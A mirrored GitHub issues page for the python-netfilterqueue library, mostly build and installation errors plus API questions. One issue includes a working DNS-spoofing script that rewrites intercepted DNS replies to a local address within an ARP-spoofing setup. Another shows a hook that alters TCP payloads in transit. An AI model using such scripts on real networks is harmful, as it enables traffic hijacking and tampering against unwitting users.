Giter Club home page Giter Club logo

python-netfilterqueue's People

Contributors

fqrouter avatar lilydjwg avatar mattfox avatar no2a avatar oremanj avatar remleduff avatar shawnyangcis avatar wgh- avatar wimkerkhoff avatar yiannist avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

python-netfilterqueue's Issues

IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored

The iptables i use are:
iptables -I FORWARD -j NFQUEUE --queue-num 0

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.oldverision.com" in qname:
            print("[+] Spoofing target ")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.0.104")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            print("packet's summary: " + str(scapy_packet.summary()))
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            print("packet's summary after modify: " + str(scapy_packet.summary()))
            print(scapy_packet.show())
            print(packet.show())
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()

Following is the output:

[+] Spoofing target 
packet's summary: IP / ICMP / IPerror / UDPerror / DNS Ans "192.168.0.104" 
Exception IndexError: IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored
[+] Spoofing target 
packet's summary: IP / UDP / DNS Ans "192.168.0.104" 
packet's summary after modify: IP / UDP / DNS Ans "192.168.0.104" 
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = None
  id        = 9623
  flags     = 
  frag      = 0
  ttl       = 63
  proto     = udp
  chksum    = None
  src       = 192.168.0.1
  dst       = 192.168.0.102
  \options   \
###[ UDP ]### 
     sport     = domain
     dport     = 61702
     len       = None
     chksum    = None
###[ DNS ]### 
        id        = 28104
        qr        = 1
        opcode    = QUERY
        aa        = 1
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 1
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]### 
         |  qname     = 'www.oldverision.com.'
         |  qtype     = A
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]### 
         |  rrname    = 'www.oldverision.com.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 0
         |  rdlen     = 4
         |  rdata     = '192.168.0.104'
        ns        = None
        ar        = None

following is the ping result:

Pinging www.oldverision.com [107.183.175.41] with 32 bytes of data:
Reply from 107.183.175.41: bytes=32 time=388ms TTL=227
Reply from 107.183.175.41: bytes=32 time=400ms TTL=227
Reply from 107.183.175.41: bytes=32 time=424ms TTL=227

netfilterqueue installation error

while trying to installl NetfilterQueue with

pip install netfilterqueue

i am getting error :
netfilterqueue.c:6436:13: error: too many arguments to function ‘(PyObject * (*)(PyObject , PyObject * const, Py_ssize_t))meth’

Installation of other modules are working fine..

can not set payload correctly with length changed

after changing the TCP payload, and the length is different, the program is abnormal:

iptables rule in test server:

iptables -A OUTPUT -p TCP -d [test client ip] -j NFQUEUE --queue-num 1

if the length is shorter after changed:
client can receive the modified payload, but the client send a RST connection to server while closing socket

if the length is longer:
client can receive the modified payload, but the server repeatedly to send the packet for several times, and the length looks like not changed via get_payload_len()

if the length is same, just replace content, all behave correctly

could you please help me? thanks, below is the test code:

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP,TCP
from scapy.packet import Packet,Raw

def print_and_accept(pkt):
    msg = IP(pkt.get_payload())
    try:
        if msg.haslayer(TCP) and msg.haslayer(Raw):
            print msg[IP].show()
            print pkt.get_payload_len()
            _Data = 'for the hook test'
            msg[TCP].remove_payload()
            msg[TCP].add_payload(_Data)
            #msg[Raw].load = _Data
            #print msg[IP].show()
            msg[IP].len = len(msg)
            del msg[IP].chksum
            del msg[TCP].chksum
            msg = msg.__class__(str(msg))
            pkt.set_payload(str(msg))
            #new_msg = IP(pkt.get_payload())
            #print new_msg[TCP].payload
            #print new_msg[IP].show()
            print msg[IP].show()
            print pkt.get_payload_len()
            pkt.accept()
        else:
            pkt.accept()
    except Exception, err:
        print err
        pkt.accept()

nfqueue = NetfilterQueue()
nfqueue.bind(1, print_and_accept)
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('')

installation problem

root@kali:~/PycharmProjects/arp_spoof# pip install NetfilterQueue
Collecting NetfilterQueue
Using cached https://files.pythonhosted.org/packages/39/c4/8f73f70442aa4094b3c37876c96cddad2c3e74c058f6cd9cb017d37ffac0/NetfilterQueue-0.8.1.tar.gz
Building wheels for collected packages: NetfilterQueue
Running setup.py bdist_wheel for NetfilterQueue ... error
Complete output from command /usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-install-wpnGkj/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" bdist_wheel -d /tmp/pip-wheel-2EQHXL --python-tag cp27:
running bdist_wheel
running build
running build_ext
building 'netfilterqueue' extension
creating build
creating build/temp.linux-x86_64-2.7
x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-Ra3Yar/python2.7-2.7.16=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC -I/usr/include/python2.7 -c netfilterqueue.c -o build/temp.linux-x86_64-2.7/netfilterqueue.o
netfilterqueue.c:439:10: fatal error: libnetfilter_queue/linux_nfnetlink_queue.h: No such file or directory
#include "libnetfilter_queue/linux_nfnetlink_queue.h"
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
error: command 'x86_64-linux-gnu-gcc' failed with exit status 1


Failed building wheel for NetfilterQueue
Running setup.py clean for NetfilterQueue
Failed to build NetfilterQueue
Installing collected packages: NetfilterQueue
Running setup.py install for NetfilterQueue ... error
Complete output from command /usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-install-wpnGkj/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-record-4vRz58/install-record.txt --single-version-externally-managed --compile:
running install
running build
running build_ext
building 'netfilterqueue' extension
creating build
creating build/temp.linux-x86_64-2.7
x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-Ra3Yar/python2.7-2.7.16=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC -I/usr/include/python2.7 -c netfilterqueue.c -o build/temp.linux-x86_64-2.7/netfilterqueue.o
netfilterqueue.c:439:10: fatal error: libnetfilter_queue/linux_nfnetlink_queue.h: No such file or directory
#include "libnetfilter_queue/linux_nfnetlink_queue.h"
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

----------------------------------------

Command "/usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-install-wpnGkj/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-record-4vRz58/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-install-wpnGkj/NetfilterQueue/

``````````````````````````````````````I have already tried this`````````````````````````````````````````````````

root@kali:~/PycharmProjects/arp_spoof# apt-get install build-essential python-dev libnetfilter-queue-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-dev is already the newest version (2.7.16-1).
The following packages were automatically installed and are no longer required:
gdal-bin gdal-data libaec0 libarmadillo8 libarpack2 libavahi-gobject0 libcharls1 libdap25 libdapclient6v5 libdapserver7v5 libdee-1.0-4
libepsilon1 libfcgi-bin libfcgi0ldbl libfolks-telepathy25 libfreexl1 libfyba0 libgail-3-0 libgcab-1.0-0 libgdal20 libgeotiff2
libgfortran4 libgmime-3.0-0 libgtk2-perl libhdf4-0-alt libhdf5-100 libkmlbase1 libkmlconvenience1 libkmldom1 libkmlengine1
libkmlregionator1 libkmlxsd1 liblwgeom-2.4-0 liblwgeom-dev libminizip1 libmission-control-plugins0 libnetcdf13 libogdi3.2 libpango-perl
libpyside1.2 libqca2 libqca2-plugins libqgis-analysis2.18.21 libqgis-core2.18.21 libqgis-customwidgets libqgis-gui2.18.21
libqgis-networkanalysis2.18.21 libqgis-server2.18.21 libqgispython2.18.21 libqhull7 libqtwebkit4 libqwt6abi1 libsane-extras
libsane-extras-common libshiboken1.2v5 libspatialindex4v5 libspatialite7 libsuperlu5 libsz2 libtelepathy-glib0 liburiparser1
libwhisker2-perl libxapian30 libxerces-c3.2 libzeitgeist-2.0-0 odbcinst odbcinst1debian2 python-backports.functools-lru-cache
python-backports.ssl-match-hostname python-cycler python-gdal python-kiwisolver python-matplotlib python-owslib python-pam python-pyproj
python-pyside.qtcore python-pyside.qtgui python-pyside.qtnetwork python-pyside.qtwebkit python-pyspatialite python-qgis
python-qgis-common python-qt4-sql python-shapely python-subprocess32 python3.6 python3.6-minimal qt4-designer ruby-faraday
telepathy-mission-control-5 x11proto-dri2-dev x11proto-gl-dev zeitgeist-core
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
cpp cpp-9 g++ g++-9 gcc gcc-9 gcc-9-base libasan5 libatomic1 libcc1-0 libgcc-9-dev libgcc1 libgomp1 libitm1 liblsan0 libquadmath0
libstdc++-9-dev libstdc++6 libtsan0 libubsan1
Suggested packages:
cpp-doc gcc-9-locales g++-multilib g++-9-multilib gcc-9-doc libstdc++6-9-dbg gcc-multilib autoconf automake libtool bison gcc-doc
gcc-9-multilib libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan5-dbg liblsan0-dbg libtsan0-dbg libubsan1-dbg libquadmath0-dbg
libstdc++-9-doc
/usr/lib/apt/methods/http: relocation error: /lib/x86_64-linux-gnu/libgnutls.so.30: symbol _idn2_punycode_decode version IDN2_0.0.0 not defined in file libidn2.so.0 with link time reference
E: Method http has died unexpectedly!
E: Sub-process http returned an error code (127)
E: Method /usr/lib/apt/methods/http did not start correctly

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

root@kali:~/PycharmProjects/net_cut# sudo apt-get install libnfnetlink-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
pkg-config
The following NEW packages will be installed:
libnfnetlink-dev pkg-config
0 upgraded, 2 newly installed, 0 to remove and 2065 not upgraded.
Need to get 71.7 kB of archives.
After this operation, 242 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 pkg-config amd64 0.29-6 [63.5 kB]
Get:2 http://ftp.harukasan.org/kali kali-rolling/main amd64 libnfnetlink-dev amd64 1.0.1-3+b1 [8,178 B]
Fetched 71.7 kB in 14s (5,206 B/s)
/usr/share/apt-listchanges/apt_listchanges.py:540: FutureWarning: Possible nested set at position 25
email_re = re.compile(r'([a-zA-Z0-9_+-.]+)@(([[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.)|(([a-zA-Z0-9-]+.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(]?)')
Selecting previously unselected package pkg-config.
(Reading database ... 344645 files and directories currently installed.)
Preparing to unpack .../pkg-config_0.29-6_amd64.deb ...
Unpacking pkg-config (0.29-6) ...
Selecting previously unselected package libnfnetlink-dev.
Preparing to unpack .../libnfnetlink-dev_1.0.1-3+b1_amd64.deb ...
Unpacking libnfnetlink-dev (1.0.1-3+b1) ...
Setting up pkg-config (0.29-6) ...
Processing triggers for man-db (2.8.3-2) ...
Setting up libnfnetlink-dev (1.0.1-3+b1) ...

Can anyone help me with this please

Needs tests

Done when there are some tests:

  • For key methods
  • Double unbind()- see #7
  • Async use- see #10
  • Use Python socket- see #5

Using python-netfilterqueue with asyncio

Hey.
I'd like to use the lib with asyncio and I wonder what would be the recommended way.
I've added a method to NetfilterQueue much like the one for patching with gevent, but I wonder if there are better options for this.

async def run_with_loop(self, loop, sock):
        """Accept packets using loop.sock_recv."""
        while True:
            try:
                buf = await loop.sock_recv(sock, BufferSize)
                rv = len(buf)

                if rv >= 0:
                    nfq_handle_packet(self.h, buf, rv)

            except socket.error as e:
                err = e.args[0]
                if err != ENOBUFS:
                    break

Send additional packets to socket fromfd

Hello,
thank you for your great work on this project.

Is it possible to send additional packets over the socket, which was returned from "socket.fromfd" ?
I try to inject additional packets, whenever one packet should be send. My current code looks somethings like this:

Best Regards
Bertram

` def setup_and_run_out_queue(self):

    cmd_out = "iptables -w -I OUTPUT -d XXX -p udp  -j NFQUEUE --queue-num " +str(out_q_num)
    os.system(cmd_out)
    print cmd_out

    self.out_nfqueue = NetfilterQueue()
    self.out_nfqueue.bind(out_q_num, self.out_queue_callback)
    self.out_sock = socket.fromfd(self.out_nfqueue.get_fd(), socket.AF_INET, socket.SOCK_DGRAM)
    print(self.out_sock )
    try:
        self.out_nfqueue.run_socket(self.out_sock)
    except KeyboardInterrupt:
        self.graceful_exit()

def out_queue_callback(self, pkt):
    pkt_ip = dpkt.ip.IP(pkt.get_payload())
    dst_ip = socket.inet_ntop(socket.AF_INET, pkt_ip.dst)
    pkt_udp = pkt_ip.data  # remove IP Layer to get UDP
    udp_payload = pkt_udp.data
    print("OUT", dst_ip, ":", pkt_udp.dport)
    self.out_sock.sendto("Test", (dst_ip, pkt_udp.dport))
    pkt.accept()`

Installation does not work via pip3

When I tried to install NetfilterQueue on Debian Buster (10.2) via pip3 (Python 3.7.3), I got the error below. However, this can be fixed by installing the development files for libnfnetlink:

apt install libnfnetlink-dev

# pip3 install NetfilterQueue
Collecting NetfilterQueue
  Using cached https://files.pythonhosted.org/packages/39/c4/8f73f70442aa4094b3c37876c96cddad2c3e74c058f6cd9cb017d37ffac0/NetfilterQueue-0.8.1.tar.gz
Building wheels for collected packages: NetfilterQueue
  Running setup.py bdist_wheel for NetfilterQueue ... error
  Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-klfwrmhd/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-fdzs9yx1 --python-tag cp37:
  running bdist_wheel
  running build
  running build_ext
  building 'netfilterqueue' extension
  creating build
  creating build/temp.linux-x86_64-3.7
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
  netfilterqueue.c:437:10: fatal error: libnfnetlink/linux_nfnetlink.h: No such file or directory
   #include "libnfnetlink/linux_nfnetlink.h"
            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  compilation terminated.
  error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

  ----------------------------------------
  Failed building wheel for NetfilterQueue
  Running setup.py clean for NetfilterQueue
Failed to build NetfilterQueue
Installing collected packages: NetfilterQueue
  Running setup.py install for NetfilterQueue ... error
    Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-klfwrmhd/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-aqiqam3y/install-record.txt --single-version-externally-managed --compile:
    running install
    running build
    running build_ext
    building 'netfilterqueue' extension
    creating build
    creating build/temp.linux-x86_64-3.7
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
    netfilterqueue.c:437:10: fatal error: libnfnetlink/linux_nfnetlink.h: No such file or directory
     #include "libnfnetlink/linux_nfnetlink.h"
              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    compilation terminated.
    error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

    ----------------------------------------
Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-klfwrmhd/NetfilterQueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-aqiqam3y/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-install-klfwrmhd/NetfilterQueue/

Once I tried it again, I received this error message:

# pip3 install netfilterqueue
Collecting netfilterqueue
  Using cached https://files.pythonhosted.org/packages/39/c4/8f73f70442aa4094b3c37876c96cddad2c3e74c058f6cd9cb017d37ffac0/NetfilterQueue-0.8.1.tar.gz
Building wheels for collected packages: netfilterqueue
  Running setup.py bdist_wheel for netfilterqueue ... error
  Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-47lo895g/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-1jkfd_rl --python-tag cp37:
  running bdist_wheel
  running build
  running build_ext
  building 'netfilterqueue' extension
  creating build
  creating build/temp.linux-x86_64-3.7
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
  netfilterqueue.c:439:10: fatal error: libnetfilter_queue/linux_nfnetlink_queue.h: No such file or directory
   #include "libnetfilter_queue/linux_nfnetlink_queue.h"
            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  compilation terminated.
  error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

  ----------------------------------------
  Failed building wheel for netfilterqueue
  Running setup.py clean for netfilterqueue
Failed to build netfilterqueue
Installing collected packages: netfilterqueue
  Running setup.py install for netfilterqueue ... error
    Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-47lo895g/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-njz1he4t/install-record.txt --single-version-externally-managed --compile:
    running install
    running build
    running build_ext
    building 'netfilterqueue' extension
    creating build
    creating build/temp.linux-x86_64-3.7
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
    netfilterqueue.c:439:10: fatal error: libnetfilter_queue/linux_nfnetlink_queue.h: No such file or directory
     #include "libnetfilter_queue/linux_nfnetlink_queue.h"
              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    compilation terminated.
    error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

    ----------------------------------------
Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-47lo895g/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-njz1he4t/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-install-47lo895g/netfilterqueue/

This error could be fixed by installing the development files for libnetfilter-queue:

apt install libnetfilter-queue-dev

But then, unfortunately, I received following error message:

# pip3 install netfilterqueue
Collecting netfilterqueue
  Using cached https://files.pythonhosted.org/packages/39/c4/8f73f70442aa4094b3c37876c96cddad2c3e74c058f6cd9cb017d37ffac0/NetfilterQueue-0.8.1.tar.gz
Building wheels for collected packages: netfilterqueue
  Running setup.py bdist_wheel for netfilterqueue ... error
  Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-_s943jue/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-8qaccoti --python-tag cp37:
  running bdist_wheel
  running build
  running build_ext
  building 'netfilterqueue' extension
  creating build
  creating build/temp.linux-x86_64-3.7
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
  netfilterqueue.c: In function ‘__pyx_f_14netfilterqueue_6Packet_set_nfq_data’:
  netfilterqueue.c:2150:68: warning: passing argument 2 of ‘nfq_get_payload’ from incompatible pointer type [-Wincompatible-pointer-types]
     __pyx_v_self->payload_len = nfq_get_payload(__pyx_v_self->_nfa, (&__pyx_v_self->payload));
                                                                     ~^~~~~~~~~~~~~~~~~~~~~~~
  In file included from netfilterqueue.c:440:
  /usr/include/libnetfilter_queue/libnetfilter_queue.h:122:67: note: expected ‘unsigned char **’ but argument is of type ‘char **’
   extern int nfq_get_payload(struct nfq_data *nfad, unsigned char **data);
                                                     ~~~~~~~~~~~~~~~~^~~~
  netfilterqueue.c: In function ‘__pyx_pf_14netfilterqueue_6Packet_4get_hw’:
  netfilterqueue.c:2533:17: warning: implicit declaration of function ‘PyString_FromStringAndSize’; did you mean ‘PyBytes_FromStringAndSize’? [-Wimplicit-function-declaration]
       __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
                   ^~~~~~~~~~~~~~~~~~~~~~~~~~
                   PyBytes_FromStringAndSize
  netfilterqueue.c:2533:15: warning: assignment to ‘PyObject *’ {aka ‘struct _object *’} from ‘int’ makes pointer from integer without a cast [-Wint-conversion]
       __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
                 ^
  netfilterqueue.c: In function ‘__Pyx_PyCFunction_FastCall’:
  netfilterqueue.c:6436:13: error: too many arguments to function ‘(PyObject * (*)(PyObject *, PyObject * const*, Py_ssize_t))meth’
       return (*((__Pyx_PyCFunctionFast)meth)) (self, args, nargs, NULL);
              ~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  netfilterqueue.c: In function ‘__Pyx__ExceptionSave’:
  netfilterqueue.c:7132:21: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
       *type = tstate->exc_type;
                       ^~~~~~~~
                       curexc_type
  netfilterqueue.c:7133:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
       *value = tstate->exc_value;
                        ^~~~~~~~~
                        curexc_value
  netfilterqueue.c:7134:19: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
       *tb = tstate->exc_traceback;
                     ^~~~~~~~~~~~~
                     curexc_traceback
  netfilterqueue.c: In function ‘__Pyx__ExceptionReset’:
  netfilterqueue.c:7141:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
       tmp_type = tstate->exc_type;
                          ^~~~~~~~
                          curexc_type
  netfilterqueue.c:7142:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
       tmp_value = tstate->exc_value;
                           ^~~~~~~~~
                           curexc_value
  netfilterqueue.c:7143:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
       tmp_tb = tstate->exc_traceback;
                        ^~~~~~~~~~~~~
                        curexc_traceback
  netfilterqueue.c:7144:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
       tstate->exc_type = type;
               ^~~~~~~~
               curexc_type
  netfilterqueue.c:7145:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
       tstate->exc_value = value;
               ^~~~~~~~~
               curexc_value
  netfilterqueue.c:7146:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
       tstate->exc_traceback = tb;
               ^~~~~~~~~~~~~
               curexc_traceback
  netfilterqueue.c: In function ‘__Pyx__GetException’:
  netfilterqueue.c:7201:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
       tmp_type = tstate->exc_type;
                          ^~~~~~~~
                          curexc_type
  netfilterqueue.c:7202:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
       tmp_value = tstate->exc_value;
                           ^~~~~~~~~
                           curexc_value
  netfilterqueue.c:7203:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
       tmp_tb = tstate->exc_traceback;
                        ^~~~~~~~~~~~~
                        curexc_traceback
  netfilterqueue.c:7204:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
       tstate->exc_type = local_type;
               ^~~~~~~~
               curexc_type
  netfilterqueue.c:7205:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
       tstate->exc_value = local_value;
               ^~~~~~~~~
               curexc_value
  netfilterqueue.c:7206:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
       tstate->exc_traceback = local_tb;
               ^~~~~~~~~~~~~
               curexc_traceback
  error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

  ----------------------------------------
  Failed building wheel for netfilterqueue
  Running setup.py clean for netfilterqueue
Failed to build netfilterqueue
Installing collected packages: netfilterqueue
  Running setup.py install for netfilterqueue ... error
    Complete output from command /usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-_s943jue/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-vjzafq78/install-record.txt --single-version-externally-managed --compile:
    running install
    running build
    running build_ext
    building 'netfilterqueue' extension
    creating build
    creating build/temp.linux-x86_64-3.7
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
    netfilterqueue.c: In function ‘__pyx_f_14netfilterqueue_6Packet_set_nfq_data’:
    netfilterqueue.c:2150:68: warning: passing argument 2 of ‘nfq_get_payload’ from incompatible pointer type [-Wincompatible-pointer-types]
       __pyx_v_self->payload_len = nfq_get_payload(__pyx_v_self->_nfa, (&__pyx_v_self->payload));
                                                                       ~^~~~~~~~~~~~~~~~~~~~~~~
    In file included from netfilterqueue.c:440:
    /usr/include/libnetfilter_queue/libnetfilter_queue.h:122:67: note: expected ‘unsigned char **’ but argument is of type ‘char **’
     extern int nfq_get_payload(struct nfq_data *nfad, unsigned char **data);
                                                       ~~~~~~~~~~~~~~~~^~~~
    netfilterqueue.c: In function ‘__pyx_pf_14netfilterqueue_6Packet_4get_hw’:
    netfilterqueue.c:2533:17: warning: implicit declaration of function ‘PyString_FromStringAndSize’; did you mean ‘PyBytes_FromStringAndSize’? [-Wimplicit-function-declaration]
         __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
                     ^~~~~~~~~~~~~~~~~~~~~~~~~~
                     PyBytes_FromStringAndSize
